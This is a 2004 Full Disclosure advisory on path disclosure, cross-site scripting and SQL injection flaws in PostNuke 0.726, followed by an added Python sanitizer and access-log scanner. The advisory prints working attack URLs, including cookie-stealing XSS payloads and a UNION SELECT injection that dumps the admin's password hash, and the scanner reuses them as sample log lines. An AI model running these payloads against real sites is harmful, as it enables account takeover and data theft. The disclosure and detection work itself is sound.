Full Disclosure mailing list archives
[waraxe-2004-SA#020 - Multiple vulnerabilities in PostNuke 0.726 Phoenix]
From: Janek Vind <come2waraxe () yahoo com>
Date: Sun, 18 Apr 2004 12:33:22 -0700 (PDT)
{================================================================================}
{                          [waraxe-2004-SA#020]                                  }
{================================================================================}
{                                                                                }
{          [ Multiple vulnerabilities in PostNuke 0.726 Phoenix ]                }
{                                                                                }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 18. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=20

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PostNuke: The Phoenix Release (0.7.2.6)

PostNuke is an open source, open development content management system (CMS).
PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides
many enhancements and improvements over the PHP-Nuke system. PostNuke is still
undergoing development but a large number of core functions are now stabilising
and a complete API for third-party developers is now in place.

If you would like to help develop this software, please visit our homepage at
http://noc.postnuke.com/

You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support #postnuke-chat #postnuke

Or at the Community Forums located at: http://forums.postnuke.com/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1 - legacy code

http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice

Fatal error: Call to undefined function: deletenotice() in
D:\apache_wwwroot\postnuke0726\admin.php on line 87

It seems that this function - deletenotice() - was removed in newer versions,
but the reference to it still exists. Btw, anyone without any authentication
can provoke this error, not only admins.

A2 - path disclosure through SQL injection

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p

Fatal error: Call to a member function on a non-object in
D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php on line 454

This is an SQL injection bug through the variable named "thold", but here we
use it only for path disclosure.

B. Cross-site scripting aka XSS:

Exploiting XSS in PostNuke is a difficult task, because PostNuke will filter
out most of the "useful" tags, like <script>. But anyway, XSS bugs exist and
they can be exploited using some custom techniques (therefore losing
cross-browser compatibility of the sploit).

B1 - XSS through unsanitized variable "$order"

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);

C. SQL injection:

C1 - critical SQL injection in NS-Polls

This is a devastating case of SQL injection, because it can be used to pull
ANY data the attacker needs out of the database.

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*

... and we will see the admin's username, email and password's md5 hash in
plaintext ;)

Remark - this sploit needs MySQL version >=4.x with UNION functionality
enabled!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia!
Greetings!

Special greets to UT Bee Clan members at http://bees.tk !

"Boom!!" ;)

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
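The three NS-Polls issues above (A2, B1 and C1) all come from the same root cause: the "thold" and "order" request parameters reach SQL and HTML without being forced to the type the code needs. The following is an added example, not code from the advisory or from PostNuke, written from the defender's side in Python. It shows (1) a sanitizer that rejects every payload shape the advisory lists by requiring integers for pollID/order/thold and a whitelisted token for mode, and (2) a log scanner that flags those request shapes in Apache-style access log lines. The whitelist of modes, the log lines and the IP addresses are constructed for the example; the URLs replay the advisory's own request shapes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Modes the poll result page is assumed to accept (the advisory only shows
# "thread"; the other two are an assumption for this example).
ALLOWED_MODES = {"thread", "flat", "nested"}

# Regexes for the payload shapes shown in the advisory.
UNION_RE = re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)
TAG_RE = re.compile(r"<\s*/?\s*(script|body|img|iframe)\b|\bon\w+\s*=", re.I)
INT_RE = re.compile(r"-?\d{1,9}")

# Apache combined-log prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)


def _first_values(query: str) -> dict:
    """Decode a query string and keep the first value of each parameter."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def sanitize_poll_params(query: str) -> dict:
    """Return validated NS-Polls parameters or raise ValueError.

    Everything that ends up in SQL or HTML is coerced to the type the code
    needs: integers for pollID/order/thold, a whitelisted token for mode.
    A value such as "99999 UNION SELECT ..." or "ppp><script>" never
    reaches the query or the page because int parsing rejects it here.
    """
    raw = _first_values(query)
    clean = {}
    for name in ("pollID", "order", "thold"):
        value = raw.get(name, "0")
        if not INT_RE.fullmatch(value):
            raise ValueError(f"{name}: expected an integer, got {value!r}")
        clean[name] = int(value)
    mode = raw.get("mode", "thread")
    if mode not in ALLOWED_MODES:
        raise ValueError(f"mode: {mode!r} is not in the whitelist")
    clean["mode"] = mode
    return clean


def request_is_acceptable(query: str) -> bool:
    """Convenience wrapper: True when sanitize_poll_params() accepts the query."""
    try:
        sanitize_poll_params(query)
        return True
    except ValueError:
        return False


def classify_query(query: str) -> list:
    """Label a query string with the attack patterns from the advisory it matches."""
    findings = []
    for name, value in _first_values(query).items():
        if name not in ("thold", "order", "pollID"):
            continue
        # The advisory splits "script" with %00 to slip past the tag filter;
        # drop NUL bytes before matching so that trick does not hide the tag.
        value = value.replace("\x00", "")
        if UNION_RE.search(value) or "/*" in value:
            findings.append(f"sqli:{name}")
        if TAG_RE.search(value):
            findings.append(f"xss:{name}")
        if not INT_RE.fullmatch(value):
            findings.append(f"non-numeric:{name}")
    return findings


def scan_access_log(lines) -> list:
    """Return (client_ip, request_path, findings) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_query(urlsplit(m.group("path")).query)
        if findings:
            hits.append((m.group("ip"), m.group("path"), findings))
    return hits


# Constructed access-log lines replaying the advisory's request shapes (C1, B1, A2)
# plus one benign request.
BASE = "/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread"
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Apr/2004:12:33:22 -0700] "GET ' + BASE
    + '&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/* HTTP/1.0" 200 5120',
    '10.0.0.5 - - [18/Apr/2004:12:34:01 -0700] "GET ' + BASE
    + '&order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99 HTTP/1.0" 200 4870',
    '10.0.0.5 - - [18/Apr/2004:12:35:10 -0700] "GET ' + BASE
    + '&order=0&thold=p HTTP/1.0" 200 310',
    '10.0.0.9 - - [18/Apr/2004:12:36:45 -0700] "GET ' + BASE
    + '&order=0&thold=0 HTTP/1.0" 200 4990',
]

if __name__ == "__main__":
    for ip, path, findings in scan_access_log(SAMPLE_LOG):
        print(ip, findings, path[:80])
```

The scanner works on the decoded parameter values rather than the raw URL, which is why the `%00`-split `<script>` tag in B1 is still caught; a rule that only greps the raw log line for the string "script" would miss it. On the application side, the integer check alone closes A2, B1 and C1 for these parameters, and the fatal-error path disclosures stop being reachable once invalid input is rejected before the query runs.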